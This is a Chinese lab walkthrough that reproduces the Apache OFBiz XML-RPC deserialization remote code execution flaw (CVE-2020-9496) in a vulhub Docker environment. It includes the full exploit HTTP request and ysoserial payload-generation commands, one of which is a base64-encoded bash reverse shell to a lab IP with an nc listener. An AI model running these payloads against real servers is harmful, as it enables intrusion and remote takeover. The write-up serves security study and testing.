0x00简介
Apache OFBiz全称是The ApacheOpen For Business Project。是开放的电子商务平台,是一个非常著名的开源项目,提供了创建基于最新的J2EE/XML规范和技术标准,构建大中型企业级、快平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架。OFBiz几乎实现了所有的J2EE核心设计模式,各个模块之间的耦合比较松散,用户能够比较容易的根据自己的需要进行拆卸,非常灵活。
0x01漏洞概述
Apache ofbiz 存在反序列化漏洞,攻击者 通过 访问未授权接口,构造特定的xmlrpc http请求,可以造成远程代码执行的影响。
0x02影响版本
- Apache Ofbiz:< 17.12.04
0x03环境搭建
1、本次环境使用vulhub搭建,在装有docker环境的虚拟机中下载
git clone https://github.com/vulhub/vulhub.git
2、进入漏洞目录,使用docker-compose拉取漏洞环境,看到绿色的done表示成功
cd vulhub/ofbiz/CVE-2020-9496/
docker-compose up -d
3、在浏览器访问https://your-ip:8443/myportal/control/main访问注册页面
4、安装漏洞复现所需要的环境
4.1安装java8环境
https://www.oracle.com/java/technologies/javase/javase-jdk8-downloads.html根据自己系统版本选择jdk下载
4.2下载完成创建一个文件夹,把下载好的java解压到创建的文件
mkdir /opt/java
tar zxvf jdk-8u251-linux-x64.tar.gz -C /opt/java
4.3添加Java环境变量
vim /etc/profile
末尾增加
export JAVA_HOME=/opt/java/ jdk1.8.0_141
export CLASSPATH=.:${JAVA_HOME}/lib:${JRE_HOME}/lib
4.4添加完成后使用环境变量马上生效,刷新完成后查看java版本
source /etc/profile
java -version
5、安装maven,使用wget下载mvn
wget https://mirrors.bfsu.edu.cn/apache/maven/maven-3/3.6.3/binaries/apache-maven-3.6.3-bin.tar.gz
mkdir /opt/maven
tar zxvf apache-maven-3.6.3-bin.tar.gz -C /opt/maven/
5.1配置环境变
vim /etc/profile
5.2在最下面增加
export MAVEN_HOME=/opt/maven/apache-maven-3.6.3
export PATH=$MAVEN_HOME/bin:$PATH
5.3添加完成后使用环境变量马上生效,刷新完成后查看maven版本
source /etc/profile
mvn -version
0x04漏洞复现
1、在GitHub上下载java反序列化利用工具ysoserial,
git clone https://github.com/frohoff/ysoserial.git
2、进入ysoserial目录使用maven下载编译需要得包,编译成功为以下图片
mvn clean package -DskipTests
3、在ysoserial目录可以看到有一个target目录,进入此目录
4、在页面url访问以下链接使用Burp抓包,并发送到Repeater模块
https://your-ip:8443/webtools/control/xmlrpc
5、把数据包替换成以下数据包
POST /webtools/control/xmlrpc HTTP/1.1
Host: your-ip
Content-Type: application/xml
Content-Length: 4093
<?xml version="1.0"?>
<methodCall>
<methodName>ProjectDiscovery</methodName>
<params>
<param>
<value>
<struct>
<member>
<name>test</name>
<value>
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64-payload]</serializable>
</value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>
6、使用使用ysoserial的CommonsBeanutils1来生成Payload在tmp目录写入文件
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 "touch /tmp/success" | base64 | tr -d "\n"
7、复制base64编码得payload,粘贴到burp数据包中base64payload的地方,点击发送,可以进docker中查看是否写入成功
8、利用漏洞反弹shell,去以下网址把反弹shellpayload进行base64编码
http://www.jackson-t.ca/runtime-exec-payloads.html
9、把编码后的shell在使用ysoserial工具进行一次base64编码
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMS4xMzIvMjI1OSAwPiYx}|{base64,-d}|{bash,-i}" | base64 | tr -d "\n"
10、nc设置监听,把生成的exp放入到burp的数据包中发送,查看nc监听以返回shell
0x05修复建议
1、建议升级至最新版本
